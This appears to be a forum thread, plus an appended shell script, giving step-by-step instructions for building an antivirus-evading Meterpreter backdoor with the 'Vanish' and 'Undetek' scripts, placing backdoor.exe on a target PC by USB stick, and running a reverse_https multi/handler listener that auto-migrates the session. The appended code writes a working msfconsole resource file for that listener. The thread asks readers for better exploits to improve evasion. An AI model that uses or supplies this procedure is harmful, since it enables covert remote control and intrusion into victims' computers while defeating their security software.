Metasploit & Vanish Script For BackBox

Started by ltdan, April 29, 2013, 06:44:06 PM


ltdan


The video http://www.youtube.com/watch?v=uXYkesXr8uA demonstrates how to bypass AV on XP Pro.

I tested the Vanish script on Win 7 x64 with ESET and an interactive firewall. The firewall in interactive mode shows the request for the call-out, but does not show the backdoor as a trojan when the AV is turned on. If anyone has anything to help improve this, such as better exploits etc., please post a link.

The Vanish script was made for BT. The way I got it to work on BackBox 3 was to first open Synaptic and install binutils-mingw-w64-i686;
after that's installed, install gcc-mingw32 from Synaptic, and after that gcc-mingw-w64.

1. Place the Vanish script into /opt/backbox/msf.
Here's the script: http://pastebin.com/7xmvGnks

2. Go to line 43 in the script and change reverse_tcp to reverse_https.

3. Then go to line 91 and uncomment it.
Rename the script to Vanish.sh and run it from the msf directory: ./Vanish.sh

4. It'll ask for your net connection; choose eth0 or wlan0 etc.
The port is 8443; for the random seed number I simply picked 8001;
encode 10 times.

5. After it's done, from the msf folder go into the seclabs folder, copy backdoor.exe onto your stick and place it on the target PC.

A meterpreter file that is needed is located at: https://sites.google.com/a/invisibledenizen.org/upload/asdf/launch_and_migrate.rb?attredirects=0.

6. Place that in /opt/backbox/msf/scripts/meterpreter.

7. Open msfconsole and run these commands:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
show options
set LHOST 192.168.1.xxx
set LPORT 8443
show advanced
set AutoRunScript launch_and_migrate
exploit
lt

Found this script; it's very much the same but automates better. I placed it in the Meta folder. After doing the same as above so it has the dependencies installed, ESET did not detect it; however, the cmd window has to stay open for meterpreter to stay connected. I chose option 2, reverse_https, copied the text (didn't download to gedit) and renamed the file Undetek.sh: http://pastebin.com/w6hYF7Hp
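As an added example (not from ltdan's post or from the Vanish/Undetek scripts): the handler commands from step 7 written as a small POSIX shell generator for an msfconsole resource file, so the listener can be started with `msfconsole -q -r handler.rc` instead of typing the commands each time. LHOST and LPORT are validated before anything is written, because a typo there is the usual reason the firewall pop-up on the target shows a call-out that never lands. The `ExitOnSession false` and `exploit -j` lines are my additions (real multi/handler options) so the listener stays up for more than one callback; the script name `launch_and_migrate` and the address 192.168.1.10 are assumed values.

```shell
#!/bin/sh
# Added example, not part of the original post: build an msfconsole resource
# file for the reverse_https multi/handler listener described in step 7.

# Validate a dotted-quad IPv4 address (assumption: LHOST is an IP, not a hostname).
valid_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  # Split on '.' in a subshell so IFS is not changed for the caller.
  ( IFS=.; set -- $1; for o; do [ "$o" -le 255 ] || exit 1; done )
}

# Validate a TCP port in 1..65535.
valid_port() {
  echo "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the resource-file contents for the handler on stdout.
# $1 = LHOST, $2 = LPORT, $3 = AutoRunScript name (default: launch_and_migrate,
# the meterpreter script the post places in scripts/meterpreter).
make_handler_rc() {
  lhost=$1; lport=$2; autorun=${3:-launch_and_migrate}
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
set AutoRunScript $autorun
exploit -j
EOF
}

# Usage (assumed address): make_handler_rc 192.168.1.10 8443 > handler.rc
#                          msfconsole -q -r handler.rc
```

The LHOST written here must be the address the target can actually reach; if the backdoor was built with a different LHOST/LPORT pair in the Vanish prompts, the firewall will show the call-out going to that pair and this handler will never see the session.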